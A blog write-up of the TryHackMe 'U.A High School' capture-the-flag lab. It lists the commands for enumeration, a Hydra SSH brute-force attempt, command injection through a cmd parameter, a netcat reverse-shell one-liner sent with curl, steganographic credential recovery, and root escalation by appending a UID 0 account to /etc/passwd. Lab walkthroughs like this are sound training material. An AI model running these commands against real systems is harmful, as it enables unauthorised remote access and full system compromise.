Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Challenges: U.A High School (TryHackMe)

Updated
4 min read
Challenges: U.A High School (TryHackMe)
J
Jebitok

Software Developer | Learning Cybersecurity | Open for roles *

If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

This challenge tasked us with testing the security of a web application developed by U.A., the renowned Superhero Academy. The objective was to identify vulnerabilities, gain initial foothold access, escalate privileges, and ultimately retrieve the required flags. To achieve this, we began with network and directory enumeration using tools such as nmap and gobuster. This initial phase revealed accessible web endpoints that allowed command execution via the cmd parameter. Using this entry point, we gained shell access as the www-data user, discovered hidden files, decoded embedded credentials, and leveraged them to pivot into a user account with SSH access.

Join us in the mission to protect the digital world of superheroes! U.A., the most renowned Superhero Academy, is looking for a superhero to test the security of our new site.

Our site is a reflection of our school values, designed by our engineers with incredible Quirks. We have gone to great lengths to create a secure platform that reflects the exceptional education of the U.A.

Please allow the machine 3 - 5 minutes to fully boot.

Answer the questions below

  1. What is the user.txt flag?

    The challenge focused on identifying vulnerabilities in a superhero-themed web application. We began with reconnaissance using nmap to scan for open ports and gobuster to enumerate directories and files. This revealed an index.php page under /assets with a cmd parameter is vulnerable to command injection.

    nmap -sV IP_Address

    gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt

    gobuster dir -u http://IP_Address/assets -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

    gobuster dir -u http://IP_Address/assets -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

Testing this parameter allowed us to execute commands on the host, including reading /etc/passwd, which revealed a user named deku. We attempted to brute force deku’s SSH credentials using Hydra, but it was unsuccessful. Instead, we exploited the command injection to establish a reverse shell back to our machine using nc and curl.

http://IP_Address/assets/index.php?cmd=ls

http://IP_Address/assets/index.php?cmd=cat /etc/passwd

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
    syslog:x:104:110::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
    landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:110:1::/var/cache/pollinate:/bin/false
    fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
    sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    deku:x:1000:1000:deku:/home/deku:/bin/bash

    lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
    ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash

We had a user called deku who revealed before tried using Hydra and SSH to find the user’s password, but it didn’t work:

hydra -l deku -P /usr/share/wordlists/rockyou.txt ssh://IP_Address

Run these two commands in separate tabs:

nc -lvnp 443

curl -s 'http://IP_Address/assets/index.php' -G --data-urlencode 'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.250.155 443 >/tmp/f'

Once inside as the www-data user, we discovered a hidden folder named Hidden_Content, which contained a passphrase.txt file encoded in Base64 and an image (oneforall.jpg) with a corrupted header. After repairing the header using hexedit, we extracted hidden data using steghide, which revealed credentials for the deku account. Using these credentials, we successfully logged in via SSH and located the user.txt flag.

After running the curl command, check the tab that has nc -lvnp 443 and we get access to www-data

We found a Hidden_Content folder that had a passphrase.txt file. We checked the content and decoded the base64 hash

There was a JPG image that we had to fix the header

cp oneforall.jpg fixed.jpg

hexedit fixed.jpg


    FF D8 FF E0    00 10 4A 46    49 46

steghide extract -sf fixed.jpg

The passphrase: AllmightForEver!!!

cat creds.txt

The credentials of deku are now revealed, so we’ll access the user through SSH

ssh deku@IP_Address

find / -type f -name user.txt 2>/dev/null

  1. What is the root.txt flag?

    For privilege escalation, we examined sudo -l output and identified a script (/opt/NewComponent/feedback.sh) that could be run with elevated privileges. Although direct modification of /etc/passwd was restricted, the script allowed us to append a custom root-level user. By adding our own user entry with UID 0, we escalated to root privileges, located the root.txt flag, and completed the challenge.

    sudo -l

    pwd

    cat /opt/NewComponent/feedback.sh

    sudo /opt/NewComponent/feedback.sh

    cat /tmp/test.txt

    ls -la /tmp/test.txt

    mkpasswd -m md5crypt -s // need admin permission

nano /etc/passwd

tried to add: jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash to /etc/passwd but we only had read-only access

sudo /opt/NewComponent/feedback.sh

copied: jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash

tail -n1 /etc/passwd

nano /etc/passwd

confirming that jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash has been added to /etc/passwd

su - jxf

find / -type f -name root.txt 2>/dev/null
cat /root/root.txt

By chaining together web exploitation, reverse shell access, credential discovery, and privilege escalation through a vulnerable script, we successfully retrieved both the user.txt and root.txt flags. This exercise demonstrated how multiple small vulnerabilities—such as arbitrary command execution, insecure file permissions, and weak credential management—can be exploited in sequence to compromise a system fully. It reinforced the importance of secure coding, proper file access controls, and credential handling in protecting real-world systems.

#websecurity#privilege-escalation#linux#tryhackme#ctf-writeup
19 views

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

432 posts